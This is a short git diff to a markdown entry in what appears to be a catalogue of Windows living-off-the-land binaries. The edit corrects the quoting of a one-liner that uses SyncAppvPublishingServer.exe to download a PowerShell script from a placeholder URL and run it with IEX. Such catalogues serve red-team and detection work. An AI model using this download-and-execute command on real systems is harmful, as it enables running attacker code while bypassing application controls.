diff --git a/md/Syncappvpublishingserver.exe.md b/md/Syncappvpublishingserver.exe.md index 1666c76..f797e2b 100644 --- a/md/Syncappvpublishingserver.exe.md +++ b/md/Syncappvpublishingserver.exe.md @@ -1,7 +1,7 @@ ## Syncappvpublishingserver.exe ``` -SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString("http://some.url/script.ps1") | IEX +SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Execute powershell code from URL ``` * Windows binary: True